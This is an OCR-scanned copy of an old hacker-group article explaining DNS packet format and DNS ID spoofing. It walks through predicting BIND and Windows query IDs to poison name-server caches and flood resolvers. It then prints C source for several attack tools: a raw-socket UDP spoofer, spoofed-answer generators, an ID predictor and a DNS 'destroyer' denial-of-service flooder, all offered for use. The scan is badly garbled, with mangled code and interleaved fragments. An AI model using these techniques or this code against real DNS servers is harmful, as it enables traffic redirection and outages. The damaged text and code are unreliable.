Reverse name lookup resolution: 
100.20.40.3 will become 3.40.20.100.in-addr.arpa 


This method is only for the IP resolution request (reverse DNS). 


Let’s look at a practical example of when we take the IP address of 
www.heike.com (31.33.7.44 or "44.7.33.31.in-addr.arpa" after the translation 
into a comprehensible format by DNS). 


gethostbyaddr ("31.33.7.44"); 


We send our request to ns.bibi.com: 


[bla.bibi.com] [ns.bibi.com] 
111.0..2. 22332600 ----= > [?44.7.33.31.in-addr.arpa] ----- SOV 222922253 


Which is forwarded to ns.internic.net: 


[ns.bibi.com] [ns.internic.net] 
111.1.2.222:53  ----- > [?44.7.33.31.in-addr.arpa] ------ > 198.41.0.4:53 


ns.internic.net will send the IP of a name server which has authority on 
’31.in-addr.arpa’. 


[ns.internic.net] [ns.bibi.com] 
198.41.0.4:53 --> [DNS for 31l.in-addr.arpa is 144.44.44.4] -> 111.1.2.222:53 


Now ns.bibi.com will ask the same question to the DNS at 144.44.44.4: 


[ns.bibi.com] [ns.for.com] 

LAT SA D222 OS SS >[?44.7.33.31.in-addr.arpa]-—----- > 144.44.44.4:53 

And so on. The mechanism is nearly the same that was used for name resolution. 
--[1.2]-- DNS packet header 


Here is the format of a DNS message 


ID (the famous :) flags 
numbers of questions numbers of answer 
number of RR authority number of supplementary RR 
\ \ 
\ QUESTION \ 
\ \ 
\ ANSWER \ 
\ \ 
. Stuff etc.. No matter \ 


--[1.3]-- Structure of DNS packets. 
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The ID permits us to identify each DNS packet, since exchanges between nam 
servers are from port 53 to port 53, and more it might be more than one 
request at a time, so the ID is the only way to recognize the different DNS 
requests. Well talk about it later... 


__flags__ 
The flags area is divided into several parts 


4 bits 3 bits (always 0) 
| | 
| | 
[QR | opcode | AA| TC] RD| RA | zero | rcode ] 
| 


| en | nee oe | |_ 4 Obits 
| |_ 1 bit 
| 
bate 
QR = If the OR bit = 0, it means that the packet is a question, otherwise 
it’s an answer. 
opcode = If the value is 0 for a normal request, 1 for a reserve request, and 
2 for a status request (we don’t need to know all these modes). 
AA = If it’s equal to 1, it says that the name server has an authoritative 
answer. 
TC = No matter 
RD = If this flag is to 1, it means "Recursion Request", for example when 
bla.bibi.com asks ns.bibi.com to resolve the name, the flag tells the 
DNS to assume this request. 
RA = If it’s set to 1, it means that recursion is available. This bit is 
set to 1 in the answer of the name server if it supports recursion. 
Zero = Here are thr zeroes... 
rcode = It contains the return error messages for DNS requests if 0, it means 


"no error", 3 means "name error" 


The 2 following flags don’t have any importance for us. 


DNS QUESTION: 


Here is the format of a DNS question 


name of the question 


type of question type of query 


The structure of the question is like this. 


example: 
www.heike.com will be [3|wlw|w/5|hlelilkle|3|clo|m|0] 
for an IP address, the format remains the same. 


44.33.88.123.in-addr.arpa would be: 
[2]4]4/2|3/3/2|8/8/3|1/2/3|7liln|-lald|d/r/4l/alr|/pla|0] 
[note]: a compression format exists, but we won’t cover it. 


type of question: 
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Here are the values that we will use much of the time (there are many more, 
but these are only ones relevant): 


name value 
A | 1 | IP Address (resolving a name to an IP) 
PTR | 12 | Pointer (resolving an IP to a name) 


type of query: 


The values are the same as the type of question. 


DNS ANSWER: 


Here is the format of an answer (an RR) 


name of the domain 


type | class 


TTL (time to live) 


resource data length 


resource data 


name of the domain: 


The name of the domain in reports to the following resource: The domain name 
is stored in the same way that the part question for the resolution request of 
www.heike.com, the flag "name of the domain" will contain 
[3|wlwlw/5/hlelilkle|l3lclo|m|0Q]. 


type: 


The type flag is the same than "type of query" in the question part of the 
packet. 


class: 
The class flag is equal to 1 for Internet data. 


time to live: 
This flag explains in seconds the time-life of the information into the 
name server cache. 


resource data length: 
The length of resource data, for example if resource data length is 4, it 
means that the data in resources data are 4 bytes long. 


resource data: 
here we put the IP for example (at least in our case) 


I will offer you a little example that explains this better: 


Here is what’s happening when ns.bibi.com asks ns.heike.com for 
www.heike.com’s address 


ns.bibi.com:53 ---> [?www.heike.com] ----> ns.heike.com:53 (Phear Heike ;) 
ID = 1999 QR = 0 opcode = 0 RD = 1 
numbers of questions = htons (1) numbers of answers = 0 
number of RR authoritative = 0 number of supplementary RR = 0 
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<the question part> 


name of the question = [3|wlwlw|5/hle/ilkle|3|clolm|0] 


type of question = htons (1) type of query=htons (1) 


here is for the question. 


now let’s stare the answer of ns.heike.com 


ns.heike.com:53 -->[IP of www.heike.com is 31.33.7.44] --> ns.bibi.com:53 
ID = 1999 QR=1 opcode=0 RD=1 AA =1 RA=l1 
numbers of questions = htons (1) numbers of answers = htons (1) 
number of RR authoritative = 0 number of supplementary RR = 0 
name of the question = [3|wlwlw|5/hle/ilkle|3|clolm|0] 
type of question = htons (1) type of query = htons (1) 
name of the domain = [3|wlwlw]5/|hlelilklel3|clo|m|0] 
type = htons (1) | class = htons (1) 
time to live = 999999 
resource data length = htons(4) | resource data=inet_addr("31.33.7.44") 


Yah! That’s all for now :)) 


Here is an analysis: 

In the answer QR = 1 because it’s an answer :) 

AA = 1 because the name server has authority in its domain 
RA = 1 because recursion is available 


Good =) I hope you understood that cause you will need it for the following 
events. 


--[2.0]-- DNS ID hack/spoof 


Now it’s time to explain clearly what DNS ID hacking/spoofing is. 

Like I explained before, the only way for the DNS daemon to recognize 

the different questions/answers is the ID flag in the packet. Look at this 
example: 


ns.bibi.com;53 ----- >[?www.heike.com] --—---- > ns.heike.com:53 


So you only have to spoof the ip of ns.heike.com and answer your false 
information before ns.heike.com to ns.bibi.com! 


ns.bibi.com <-------— wb Sow ack aos ca) «2 “HS vheike.com 

| 

|<--[IP for www.heike.com is 1.2.3.4]<-- hum.roxor.com 
But in practice you have to guess the good ID :) If you are on a LAN, you 


can sniff to get this ID and answer before the name server (it’s easy ona 
Local Network :) 


If you want to do this remotely you don’t have a lot a choices, you only 
have 4 basics methods: 


3.t 


Ls) 


tit 


Te fe 
Win 
Win 


and 


tt 
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Randomly test all the possible values of the ID flag. You must answer 
before the ns ! (ns.heike.com in this example). This method is obsolete 
unless you want to know the ID .. or any other favorable condition to 
its prediction. 


Send some DNS requests (200 or 300) in order to increase the chances 
of falling on the good ID. 


Flood the DNS in order to avoid its work. The name server will crash 
and show the following error! 


>> Oct 06 05:18:12 ADM named[1913]: db_free: DB _F_ ACTIVE set -— ABORT 
at this time named daemon is out of order :) 


Or you can use the vulnerability in BIND discovered by SNI (Secure 
Networks, Inc.) with ID prediction (we will discuss this in a bit). 


HHEEHEEEHEEEHEEEHHE Windows ID Vulnerability ####tEEEREEE HEE E HEHE HEHE HHH 


ound a heavy vulnerability in Windows 95 (I haven’t tested it on 

NT), lets imagine my little friend that’s on Windows 95. 

dows ID’s ar xtremely easy to predict because it’s "1" by default :))) 
"2" for the second question (if they are 2 questions at the same time). 


HHHHHHETHH HHT HHH BIND Vulnerability ## aad ttt dt dt tat oH HH oH a EEE HH HH HH 


re is a vulnerability in BIND (discovered by SNI as stated earlier). 
fact, DNS IS are easily predictable, you only have to sniff a DNS in 


order to do what you want. Let me explain... 


The 
nex 


TY, 
Her 


it 


ns. 


ns 


ns. 


ns 
ns 
ns 


DNS uses a random ID at the beginning but it only increase this ID for 
t questions ... =))) 


s easy to exploit this vulnerability. 
e is the way: 


Be able to sniff easily the messages that comes to a random DNS (ex. 
ns.dede.com for this sample). 


You ask NS.victim.com to resolve (random) .dede.com. NS.victim.com will 
ask to ns.dede.com to resolve (random) .dede.com 


ns.victim.com ---> [?(rand).dede.com ID = 444] ---> ns.dede.com 


Now you have the ID of the message from NS.victim.com, now you know what 
ID area you’ll have to use. (ID = 444 in this sample). 


You then make your resolution request. ex. www.microsoft.com to 
NS.victim.com 


(you) ---> [?www.microsoft.com] ---> ns.victim.com 
ns.victim.com -—-> [?www.microsoft.com ID = 446 ] --> ns.microsoft.com 


Flood the name server ns.victim.com with the ID (444) you already have a 
then you increase this one. 


microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 444] --> ns.victim. 
-microsoft.com -—-> [www.microsoft.com = 1.1.1.1 ID = 445] --> ns.victim. 
microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 446] --> ns.victim. 
-microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 447] --> ns.victim. 
-microsoft.com -—-> [www.microsoft.com = 1.1.1.1 ID = 448] --> ns.victim. 
-microsoft.com -—-> [www.microsoft.com = 1.1.1.1 ID = 449] --> ns.victim. 


nd 


com 
com 
com 
com 
com 
com 


3.txt Wed Apr 26 09:43:42 2017 11 


(now you know that DNS IDs are predictable, and they only increase. You 
flood ns.victim.com with spoofed answers with the ID 444+ ;) 


xxx ADMsnOOfID does this. 


There is another way to exploit this vulnerability without a root on 
any DNS 


The mechanism is very simple. Here is the explanation 
We send to ns.victim.com a resolution request for *.provnet.fr 
(you) ---------- [? (random) .provnet.fr] ------- > ns.victim.com 


Then, ns.victim.com asks nsl.provnet.fr to resolve (random) .provnet.fr. 
There is nothing new here, but the interesting part begins here. 


From this point you begin to flood ns.victim.com with spoofed answers 
(with nsl.provnet.fr IP) with ids from 100 to 110... 


(spoof) ----[(random) .provnet.fr is 1.2.3.4 ID=100] --> ns.victim.com 
(spoof) ----[(random) .provnet.fr is 1.2.3.4 ID=101] --> ns.victim.com 
(spoof) ----[(random).provnet.fr is 1.2.3.4 ID=102] --> ns.victim.com 
(spoof) ----[(random) .provnet.fr is 1.2.3.4 ID=103] --> ns.victim.com 


After that, we ask ns.victim.com if (random).provnet.fr has an IP. 


If ns.victim.com give us an IP for (random) .provnet.fr then we have 
found the correct ID :) Otherwise we have to repeat this attack until we 
find the ID. It’s a bit long but it’s effective. And nothing forbids you 
to do this with friends ;) 


This is how ADMnOg00d works ;) 


EE EH EE HH EE EE HE HEE EE EH EE EE EE EE EEE EEE EE EEE EEE EE EE HE HEE EE EEE 
Here you will find 5 programs 

ADMkillDNS - very simple DNS spoofer 

ADMsniffID - sniff a LAN and reply false DNS answers before the NS 
ADMsnOOfID - a DNS ID spoofer (you’ll need to be root on a NS) 

ADMnOg00d —- a DNS ID predictor (no need to be root on a NS) 

ADNdnsfuckr - a very simple denial of service attack to disable DNS 


Have fun!! :) 

Note: You can find source and binaries of this progs at 

ftp. janova.org/pub/ADM. I’m going to make a little HOWTO soon, which would 
be on janova. You need to install libpcap on your machine before any 
compilation of the ADMID proggies :) 


ADM Crew. 


Thanks to: all ADM crew, Shok, pirus, fyber, Heike, and w00w00 (gotta love 
these guys) 

Special Thanks: ackboo, and of course Secure Networks, Inc. (SNI) at 
www.secnet.com for finding the vulnerability =) 


<++> ADMIDpack/ADM-spoof.c 
[BORK RR KK KK KK I I I I I OR I OR I KK / 


/* ADM spoofing routine for spoof udp xf 
[BORK KKK KK KK I I I A I A I  R  / 
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define IPHDRSIZE sizeof (struct iphdr) 
define UDPHDRSIZE sizeof (struct udphdr) 
include <stdio.h> 
include <stdlib.h> 
include <unistd.h> 
include <memory.h> 


nclude <sys/types.h> 
nclude <sys/socket.h> 
nclude <sys/wait.h> 
nclude <sys/ioctl.h> 
nclude <sys/stat.h> 
nclude <netdb.h> 
nclude <netinet/in.h> 
nclude "ip.h" 

nclude "udp.h" 


Pepe pe pe pe pp pe pe 


[BORK KR KKK KK KR I I I I I I I I I I I OR I OR I / 
/* 

* in_cksum -- 

* Checksum routine for Internet Protocol family headers (C Version) 

*/ 


[BOK KKK KK KK KR I I I I I I I I OR I RK / 


unsigned short in_cksum(addr, len) 
u_short *addr; 


int len; 

{ 
register int nleft = len; 
register u_short *w = addr; 
register int sum = 0; 
u_short answer = 0; 


/* 
* Our algorithm is simple, using a 32 bit accumulator (sum), we add 
* sequential 16 bit words to it, and at the end, fold back all the 
* carry bits from the top 16 bits into the lower 16 bits. 


if 
while (nleft > 1) { 
sum += *wtt; 
nleft -= 2; 


} 


/* mop up an odd byte, if necessary */ 
if (nleft == 1) { 
*(u_char *) (&answer) = *(u_char *)w ; 
sum += answer; 


} 


/* add back carry outs from top 16 bits to low 16 bits */ 


sum = (sum >> 16) + (sum & Oxffff); /* add hi 16 to low 16 */ 
sum += (sum >> 16); /* add carry */ 
answer = ~sum; /* truncate to 16 bits */ 


return (answer); 


int udp_send(s,saddr,daddr, sport, dport, datagram, datasize) 


int. S$; 

unsigned long’ saddr; 
unsigned long daddr; 
unsigned short sport; 
unsigned short dport; 

char * datagram; 
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igned datasize; 


ockaddr_in sin; 
iphdr *ip; 
udphdr *udp; 


char *data; 

char packet [4024]; 

(struct iphdr *) packet; 

(struct udphdr *) (packet+IPHDRSIZE) ; 

(unsigned char *) (packet+IPHDRSIZE+UDPHDRSIZE) ; 


memset (packet,0,sizeof (packet) ); 


return (x 


} 


udp->source = htons 
udp->dest = htons 
udp->len = htons 
udp->check = 0; 


memset (packet, 0, IPHDRSIZ!I 


(sport); 
(dport); 
(UDPHDRSIZE+t+datasize); 


memcpy (data, datagram, datasize) ; 


GJ 


i 


ip->saddr.s_addr = saddr; 
ip->daddr.s_addr = daddr; 
ip->version = 4; 

ip->ihl = 5; 

ip->ttl = 245; 

ip->id = random() %5985; 


ip->protocol = IPPROTO_UDP; 


ip->tot_len = htons(IPHDRSIZE + UDPHDRSIZE + datasize); 
ip->check = 0; 
ip->check = in_cksum((char *) packet, IPHDRSIZE) ; 


sin.sin_family=AF_IN 


ET; 


sin.sin_addr.s_addr=daddr; 
sin.sin_port=udp->dest; 


x=sendto(s, packet, IPHDRSIZE+UDPHDRSIZE+datasize, 0, 
(struct sockaddr*)&sin, sizeof(struct sockaddr) ); 


i 


[OK KR RK KK KK KK I I I I I I A I I OR KK / 


RECV PAKET 


/* 
/* get_p 


kt (socket, *buffer , 


size of the buffer); 


2 /. 
Pf 


[BORK RR KKK I I I A I I I I I AK OR KK / 


int get_pkt (s,data, size) 


int s; 


unsigned char *data; 


int size 
{ 
struct 
int len 
len= si 


1’ 


sockaddr_in sin; 
,vesu; 
zeof (sin); 


resu=recvfrom(s,data,size,0, (struct sockaddr *)&sin,&len)j; 


return 


} 


<--> 


resu; 
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<++> ADMIDpack/ADMDNS2.c 
[BORK KR KKK KK KK IK OK OK KK / 


/* DNS include for play with DNS packet (c) ADM */ 


[BORK RR KKK KK KR RK OR RK OR KK / 


define ERROR -1 
define DNSHDRSIZE 12 
define TYPE_A 1 
define TYPE_PTR 12 


int myrand() 

{ 

int Jj; 

j=l+(int) (150.0*rand()/ (RAND_MAX+1.0)); 
return (Jj); 


} 


unsigned long host2ip(char *serv) 


{ 
struct sockaddr_in sinn; 
struct hostent *hent; 


hent=gethostbyname (serv) ; 

if(hent == NULL) return 0; 

bzero((char *)&sinn, sizeof(sinn)); 

bcopy (hent->h_addr, (char *)&sinn.sin_addr, hent-—>h_length) ; 
return sinn.sin_addr.s_addr; 


void nameformat (char *name,char *QS) 
{ 

/* CRAP & LAme COde :) */ 

char lol[3000]; 

char tmp[2550]; 

char tmp2[2550]; 

int i,a=0; 
bzero(lol, sizeof (lol) ) 
bzero (tmp, sizeof (tmp) ); 
bzero(tmp2, sizeof (tmp2) ); 


1’ 


for (i1=0;1i<strlen (name) ; i++) 

{ 

if( *(nameti) == ’.’ d{ 
sprintf (tmp2,"%Sc%Ss",a,tmp) ; 
strceat (lol, tmp2) ; 
bzero (tmp, sizeof (tmp) ); 
bzero(tmp2, sizeof (tmp2) ); 
a=0; 
} 

else tmp[att+] = *(nameti); 


} 


sprintf (tmp2,"%Sc%s",a,tmp) ; 
strceat (lol, tmp2) ; 
strcpy(QS,lol); 

} 


void nameformatIP(char *ip, char *resu) 


{ 
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char *arpa = "in-addr.arpa"; 
char bike. [-25.5)]'¢ 
char arf[255]; 
char haha[255]; 
char c; 

char *A[4]; 

int i,a=3,k=0; 


bzero(bla, sizeof (bla) 
bzero(arf, sizeof (arf) 
bzero (haha, sizeof (hah 


i 
i 
a)); 
for (i=0;i<4; itt) { 

Afi] =(char *)malloc(4); 

bzero(A[i],4); 

} 


bzero(bla, sizeof (bla)); 
bzero(arf,sizeof(arf)); 


for (i=0;i<strlen(ip);itt) 
{ 


c = iplil; 

Lf eS] el yf 
streat (A[a],arf); 
a--; 
k=0; 


bzero(arf,sizeof(arf)); 


} 
else arf[k++] = c; 


} 
strceat (A[a],arf); 


for (i=0;1i<4; itt) { 
strceat (bla,A[i]); 
strceat (bla,"."); 


} 


strcat (bla,arpa); 
nameformat (bla, haha) ; 
strcpy (resu, haha) ; 


} 


15 


int makepaketQS(char *data,char *name,int type) 


{ 


f(type == TYPE_A )f{ 
nameformat (name, data) ; 


*( (u_short *) (datat+strlen(data) +1) 


£ (type == TYPE_PTR) { 
nameformatIP (name, data) ; 
*( (u_short *) (datat+strlen(data) +1) 
} 
*( (u_short *) (datatstrlen(data) +3) 


return(strlen(data) +5); 


int makepaketAW(char *data,char *name, 


{ 


) = 


char 


htons (TYPE_A); 


7] 


htons (TYPE_PTR); 


htons (1); 


*ip,int type) 
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int 


al 


char tmp[2550]; 
bzero (tmp, sizeof (tmp) ); 


if ( 


} 


if ( 


} 


type == TYPE_A ) { 
nameformat (name, data) 
*( (u_short *) (datat 
(u_short *) (datat 
i=strlen(data) +5; 
strcepy (datat+i,data); 
i=itstrlen(data)+1; 


aa 


1’ 


strlen(data)+1) ) 
strlen(data)+3) ) 


*((u_short *) (datati)) 
*((u_short *) (datatit2) ) 
*((u_long *) (datati+4) ) 
*((u_short *) (datatits8) ) 
*((u_long *) (datati+10) ) 
return (it+14); 

type == TYPE_PTR ){ 


nameformat (name, tmp) ; 
nameformatIP (ip, data) 
*( (u_short *) (datat 
(u_short *) (datat 
i=strlen(data)+5; 

strcepy ((datati),data) 
i=(itstrlen(data)+1); 


oc 


1’ 


’ 


strepy ((data+i+10),tmp 


*((u_short *) (datati)) 

*((u_short *) (datatit2) ) 

*((u_long *) (datati+4) ) 

*((u_short *) (datatits8) ) 
) . 
) 


return (i+10+strlen (tmp 


TY 
ateeL ice 


void sendquestion(u_long s_ip, 


{ 
st 


ruct dnshdr *dns; 


char buff[1024]; 
char *data; 

int i; 

int on=1; 

int sraw; 


if ( 


if ( 
opt 


(sraw=socket (AF_INET, SOCK_RAW, IPPROTO_RAW) ) 


perror ("socket"); 
exit (ERROR) ; 
} 


(setsockopt (sraw, 
(sraw, IPPROTO_IP, 


perror("setsockopt"); 
exit (ERROR) ; 


} 


dns 
dat 


(struct dnshdr *) 
a 


buff; 


(char *) (buff£+DNSHDRSTIZI 


bzero (buff, sizeof (buff) ); 


dns->id = 6000+myrand(); 
dns->qr = 0; 

dns->rd = 1; 

dns->aa = 505 
dns->que_num = htons(1); 
dns->rep_num = htons (0); 


i=makepaketQS (data, name,type) ; 


Gl 
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len(data)+1) ) 
len(data)+3) ) 


16 


htons (TYPE 
htons (1); 
9999999; 
htons (4); 
host2ip (ip); 


= htons(TYPE_PTR); 


u_long d_ip,char *name,int type) 


IPPROTO_IP, 
IP_HDRINCL, 


rc: 


htons (1); 
9999999; 
htons (strlen(tmp) +1); 


IP_HDRINCL, 
(char *)é&on, 


(char *)éon, 
sizeof (on))) 


ERROR) { 


sizeof (on) ) 
ERROR) 


) 
{ 


ERROR) if ((setsock 
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udp_send(sraw,s_ip,d_ip, 1200+myrand, 53, buff, DNSHDRSIZEt+1i) ; 


clos 


} 


e(sraw); 


void sendawnser(u_long s_ip, u_long d_ip, char *name,char *spoofip,int ID,int type) 


{ 

str 
cha 
cha 
int 
int 
int 


if ( 
p 
e 


} 


if (( 
opt ( 
pe 
ex 


} 


dns 
data 


uct dnshdr *dns; 
r buff[1024]; 
r *data; 
ae 
on=1; 
sraw; 
(sraw=socket (AF_INET, SOCK_RAW, IPPROTO_RAW) ) == ERROR) { 


error ("socket"); 
xit (ERROR) ; 


setsockopt (sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) 
sraw, IPPROTO_IP, IP_HDRINCL, (char *)é&on, sizeof(on))) == ERROR) { 


rror("setsockopt"); 
it (ERROR) ; 


== ERROR) if ((setsock 


(struct dnshdr *) buff; 


= (char *) (buff+DNSHDRSIZI 


GI 
~~ 
~ 


bzero (buff, sizeof (buff)); 


dns->id = htons(ID); 

dns->qr = ky 

dns->rd = 1; 

dns->aa = 1; 

dns->que_num = htons (1); 

dns->rep_num = htons (1); 

i=makepaketAW (data,name, spoofip, type) ; 
printf(" I apres Makepaket == $i \n",i); 


udp_send(sraw,s_ip,d_ip, 53,53,buff,DNSHDRSIZE+i) ; 


Gu: 


ose(sraw); 


void dnsspoof(char *dnstrust,char *victim,char *spoofname, char *spoofip,int ID,int type) 


i 


a. 


{ 


struct dnshdr *dns; 
char buff [1024]; 


char *data; 
u_long fakeip; 
u_long trustip; 
u_long victimip; 
int loop, rere; 


dns = (struct dnshdr *)buff; 
data = (char *) (buff+DNSHDRSIZE) ; 
trustip = host2ip(dnstrust); 
victimip = host2ip(victim) ; 
fakeip = host2ip("12.1.1.0"); 
/* send question ... */ 
f£( type == TYPE_PTR) 
for (Loop=0; loop<4; Loopt++) sendquestion (fakeip, victimip, spoofip, type) ; 
£( type == TYPE_A) 
for (Loop=0; Loop<4; Looptt) 
sendquestion(fakeip, victimip, spoofname,type) ; 
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/* now its time to awnser Quickly !!! */ 
for(rere = 0; rere < 2;rerett) { 
for (loop=0; loop < 80; loop+tt) { 
printf ("trustip %s,vitcimip %s,spoofna %s,spoofip %s,ID %i,type %i\n", 
dnstrust,victim, spoofname, spoofip, ID+loop, type) ; 
sendawnser (trustip, victimip, spoofname, spoofip, IDt+loop, type) ; 


} 


} 
<--> 
<++> ADMIDpack/ADMdnsfuckr.c 
i ADM DNS DESTROYER */ 


define DNSHDRSIZE 12 
define VERSION "0.22 pub” 
define ERROR -1 


include <stdio.h> 
include <stdlib.h> 
include "ADM-spoof.c" 
include "dns.h" 
include "ADMDNS2.c" 


void main(int argc, char **argv) 


struct dnshdr *dns; 

char *data; 

char buffer2 [4000]; 
unsigned char namez[255]; 
unsigned long s_ip; 


unsigned long d_ip; 
int sraw,on=1; 


if(arge <2) {printf(" usage : $s <host> \n",argv[0]); exit (0); } 
dns = (struct dnshdr *)buffer2; 
data = (char *) (buffer2+12); 


bzero(buffer2,sizeof (buffer2)); 


if( (sraw=socket (AF_INET, SOCK_RAW, IPPROTO_RAW) ) == ERROR) { 
perror ("socket"); 
exit (ERROR) ; 
} 


if( (setsockopt (sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR) { 
perror("setsockopt"); 
exit (ERROR) ; 
} 


printf ("ADMdnsFuker %s DNS DESTROYER made by the ADM crew\n", VERSION) ; 


printf("(c) ADM,Heike vouais tous se ki est as moi est a elle aussi ...\n"); 
sleep(1); 


s_ip=host2ip("100.1.2.3"); 
d_ip=host2ip(argv[1]); 


dns->id = 123; 
dns->rd 
dns->que_num = htons(1); 


| 
a 
~ 
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3.txt 
while (1) { 
d(),myrand()); 
} 
} 
<--> 


sp 


pr 
st 
* 
De 


rintf (namez, "\3%d\3%d\3%d\3%d\07in-addr\04arpa",myrand(),myrand(),myran 
intf("%Ss\n",namez) ; 
rcepy (data,namez) ; 

(u_short *) (datatstrlen(namez)+1) ) = ntohs(12); 

(u_short *) (datatstrlen(namez)+3) ) = ntohs(l1); 


udp_send(sraw,s_ip,d_ip, 2600+myrand(),53,buffer2,14+strlen(namez) +5); 


S_ 
Siem 
S_ 


ip=ntohl (s_ip); 
iptt; 
ip=htonl (s_ip); 


<++> ADMIDpack/ADMkillDNS.c 


de 
de 
de 
de 
de 
de 


include 
include 
include 


fine 
fine 
fine 
fine 
fine 
fine 


"ADM-spoof.c" 


"dns.h 


W 


"ADMDNS2.c" 


Ww 


ROR 


RS ION 
START 
STOP 
RT_S1 


WUOHHI 
oouvuuvutr 


RT 


S) 


"W 


TART 
OP 


void main(int argc, 


struct 
char 
char 


dn 


= 
0.3 pub" 
D 
65535 

53 

54 


char **argv) 
shdr *dns; 


*data; 
buffer2[4000]; 


unsigned char namez[255]; 


unsigned 
unsigned 


int sraw, 


if(arge <5) { 


OP] 


i 


long Ss_ip,s_ip2; 
long d_ip,d_ip2; 


, on=1, x, loop, idstart, idstop, portstart, portstop; 


system("/usr/bin/clear") ; 


pri 


[PORT START 


dns 
data 


pri 
pri 
pri 
pri 
pri 
pri 
pri 
pri 
pri 
pri 
pri 
pri 
pri 
jopaae 


pri 


} 


nt 
] 
nt 
nt 
nt 
nt 
nt 
nt 
nt 


(struct 


= (char *) (buffer2+DNSHDRSIZI 


EB 
ny 


exit ( 


FH FH Fh FH FH EFA EFA) FEF) FE FH) FA Fh Th 


tw Ea VE Be ee GS Se ew 


(" 


usage : %S8 <ip src> <ip dst> <name> <ip>\n\t[A,B,N] [ID_START] [ID_ST 


PORT STOP] \n",argv[0]); 


(" 


(" 


ip src: ip source of the dns anwser\n"); 
ip dst: ip of the dns victim\n"); 


name : spoof name ex: www.dede.com\n"); 

ip : the ip associate with the name\n"); 
options \n"); 

[A,B,N] \n"); 


A: flood the DNS victim with multiple query\n"); 
B: DOS attack for destroy the DNS \n"); 
N: None attack \n\n"); 


[ID_START] \n"); 

ID_START: id start :> \n\n"); 
[ID_STOP] \034n"); 
TD STOP 2 tds stop lis: “\A\n'")? 


PORT START,PORT STOP: send the spoof to the portstart at portstop\n\n" 


\O033[01mADMkillDNS %s (c) ADM\033[0m , Heike \n",VERSION) ; 


RROR) ; 


dnshdr *)buffer2; 


Gl 
~~ 
~ 
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bzero (buffer2, sizeof (buffer2)); 


if( (sraw=socket (AF_INET, SOCK_RAW, IPPROTO_RAW) ) == ERROR) { 
perror ("socket"); 
exit (ERROR) ; 
} 


if((setsockopt (sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) = 
perror("setsockopt"); 
exit (ERROR) ; 
} 


ERROR) { 


printf ("ADMkillDNS %s",VERSION) ; 
printf("\nouais ben mwa je dedie ca a ma Heike"); 
printf ("\nREADY FOR ACTION! \n"); 


s_ip2=s_ip=host2ip(argv[1]); 
d_ip2=d_ip=host2ip(argv[2]); 


if (arge>5) if (*argv[5]=='’A’) 
{ 
for (Loop=0; Loop<10; Looptt) { 


dns->id = 6000+1loop; 
dns->qr = 0; 
dns->rd = 1; 
dns->aa = 0; 


dns->que_num = htons (1); 

dns->rep_num = htons (0); 
i=makepaketQS (data, argv[3],TYPE_A); 
udp_send(sraw,s_ip,d_ip, 1200+loop, 53,buffer2,DNSHDRSIZE+t1i) ; 
s_ip=ntohl(s_ip); 

s_iptt; 
s_ip=htonl(s_ip); 


} 
} /* end of DNS flood query */ 


/* ici on trouve la routine contre un DOS */ 


if (arge>5) if (*argv[5]=='B’ ) 
{ 
s_ip=host2ip("100.1.2.3"); 
dns->id = 123; 
dns->rd = 1; 
dns->que_num = htons(1); 


printf("plz enter the number of packet u wanna send\n"); 
scanf("%i",&1); 
for (x=0;x<i;x++) { 


sprintf (namez, "\3%d\3%d\3%d\3%d\07in-addr\04arpa",myrand(),myrand(),myran 
d(),myrand()); 

strcpy (data,namez) ; 
*( (u_short *) (datatstrlen(namez)+1) ) = ntohs(12); 
*( (u_short *) (datatstrlen(namez)+3) ) = ntohs(1); 
udp_send(sraw,s_ip,d_ip, 2600+myrand(),53,buffer2,14+strlen(namez) +5); 
s_ip=ntohl(s_ip); 
s_ipt+t; 
s_ip=htonl(s_ip); 

printf ("send packet num %i:%i\n",x,1i); 


} 
} /* end of DNS DOS */ 


if(argce > 6 )idstart = atoi(argv[6]); 
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else 

idstart = ID_START; 
if(argce > 7 )idstop = atoi(argv[7]); 
else 


idstop = ID_STOP; 


if(argce > 8 ){ 


portstart = atoi(argv[8]); 
portstop = atoi(argv[9]); 
} 

else { 
portstart = PORT_START; 
portstop = PORT_STOP; 


} 


bzero (buffer2, sizeof (buffer2)); 
bzero(namez, sizeof (namez)); 
i=0; 

x=0; 

s_ip=s_ip2; 

d_ip=d_ip2; 


for(;idstart<idstop;idstartt+t+) { 


dns->id = htons(idstart); 
dns->qr = 1; 

dns->rd = 1; 

dns->aa =e 1 

dns->que_num = htons(1); 
dns->rep_num = htons(1); 


printf("send awnser with id %i to port %i at port %i\n",idstart,portstart,portstop) ; 


i=makepaketAW (data,argv[3],argv[4],TYPE_A); 
for(;x < portstop; x++) 

udp_send(sraw,s_ip,d_ip, 53,x,buffer2,DNSHDRSIZEti) ; 
xX = portstart; 


} 


printf(" terminated..\n"); 
} 

<--> 

<++> ADMIDpack/ADMnOg00d.c 


[ROR KK RK RK KKK KK KK OK KK / 


/* BADMnog00d (c) ADM x, 


[BKK KKK KKK KK KK OK KK KK OK / 


/*  BDM DNS ID PREDICTOR ey 


[ROKK KKK KR KKK KK OK KK KK / 


include <fcntl.h> 
include <unistd.h> 
include "dns.h" 
include "ADM-spoof.c" 
include "ADMDNS2.c" 


define VERSION "0.7 pub" 

define SPOOFIP "4.4.4.4" 

#define ERROR -l 

define LEN sizeof (struct sockaddr) 


define UNDASPOOF "111.111.111.111" 
define TIMEOUT 300 
define DNSHDRSIZE 12 


void usage () 


3.txt 


print 
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£(" ADMnoGOOD <your ip> <dns trust> <domaine trust> <ip victim> <TYPE> <spoof name> 


<spoof ip> <ns.trust.for.the.spoof> [ID] \n"); 


print 
haha.hol 
print 


Se 
ee au 


312.3. 37 \n" 


print 
print 
print 
print 
print 
print 
exit ( 


} 


Fr FH Fh Fh FH Fh 


RAN AR ARR 


F("\n ex: 


ADMnoG0O0d ppp.evil.com nsl.victim.com provnet.fr ns.victim.com 1 mouhhaha 


31.3.3.7 ns.isdnet.net [ID] \n"); 


we going to poison ns.victime.com for they resolv mouhhahaha.hol.fr in 


we use provnet.fr and nsl.provnet for find ID of ns.victim.com\n"); 

we use ns.isdnet.net for spoof because they have auth on *.hol.fr\n"); 
for more information..\n"); 

check ftp.janova.org/pub/ADM/ \n"); 


ADM@janova.org \n"); 


ask Heike from me...:) \n"); 


